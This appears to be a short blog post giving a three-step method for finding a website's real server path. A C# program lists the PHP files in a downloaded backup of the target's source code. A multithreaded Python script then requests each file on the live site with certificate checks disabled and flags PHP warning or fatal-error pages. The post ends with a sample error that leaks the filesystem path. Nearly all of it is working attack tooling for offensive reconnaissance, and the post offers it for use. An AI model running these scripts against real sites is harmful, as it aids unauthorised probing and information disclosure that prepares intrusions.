2020-10-31 | Python | UNLOCK

backup source code search real path

BackupGetFiles.cs

step1: GetBackupFiles

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
using System;
using System.IO;
using System.Collections.Generic;
class test
{
static void Main(string[] args)
{
string root = @"?:\Backup\www.target.com";
string flag,currentr;
flag = root.Contains("/") ? "/" : @"\";
if(root.EndsWith("/") || root.EndsWith("\\")){
if(root.EndsWith("/")){
currentr = root.Split(new char[1]{flag.ToCharArray()[0]})[root.Split(new char[1]{flag.ToCharArray()[0]}).Length - 2];
}else{
currentr = root.Split(new char[1]{flag.ToCharArray()[0]})[root.Split(new char[1]{flag.ToCharArray()[0]}).Length - 2];
}
}else{
currentr = root.Split(new char[1]{flag.ToCharArray()[0]})[root.Split(new char[1]{flag.ToCharArray()[0]}).Length - 1];
}

DirectoryInfo info = new DirectoryInfo(root);
TextWriter tmp = Console.Out;
StreamWriter sw = new StreamWriter(currentr+".txt");
Console.SetOut(sw);
ViewDirectory(info,root);
Console.SetOut(tmp);
Console.WriteLine("WriteFileok => "+currentr+".txt");
sw.Close();
Console.ReadKey();
}
static void ViewDirectory(DirectoryInfo info,string r,string end = "php",bool nfolders = true)
{
FileInfo[] files = info.GetFiles();
//show all files
if(files != null && files.Length > 0) foreach(FileInfo file in files)
{
string rfile = file.FullName.ToString().Replace(r,"").Replace("\\","/");
//取后缀
if(rfile.EndsWith(end)){
//不要根目录
if(rfile.Split(new char[1]{'/'}).Length!=2){
if(nfolders){
// 提取全部带目录/admin/sql.php
Console.WriteLine(rfile);
}else{
// 提取全部不带目录sql.php 会碰到index.php等重复的情况
Console.WriteLine(file);
}
}

}

}

DirectoryInfo[] directoies = info.GetDirectories();
//show all sub directories
if(directoies != null && directoies.Length > 0)
{
foreach(DirectoryInfo d in directoies)
{
//Console.WriteLine("{0} {1}",d,d.FullName);
ViewDirectory(d,r);
}
}
}
}

blind_fuzz.py

step2: blind fuzz error

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
from concurrent.futures import ThreadPoolExecutor

requests.packages.urllib3.disable_warnings()
def error_fuzz(url):
r = requests.get(url,allow_redirects=True,verify=False)
selfname = r.url.split("/")
#print(selfname[-1])
if selfname[-1] in r.text:
print('[+].getone Maybe Error => '+r.url)
#PHP
if "Warning" in r.text:
print('[+].getone Maybe Error => '+r.url)
#PHP
if "Fatal error" in r.text:
print('[+].getone Maybe Error => '+r.url)


filedic = [x.strip() for x in open('target.txt','r',encoding='UTF-8').readlines()]
with ThreadPoolExecutor(1000) as task_executor:
for url in filedic:
url = "https://target/{}".format(url)
task_executor.submit(error_fuzz,url)

verify

step3:
Request result target.com/error.files
Verify Target real path

1
2
3
Warning: require(/e/class/connect.php): failed to open stream: No such file or directory in /www/wwwroot/target/e/?.php on line 2

Fatal error: require(): Failed opening required '/e/class/connect.php' (include_path='.:/www/server/php/56/lib/php') in /www/wwwroot/target/e/?.php on line 2

评论加载中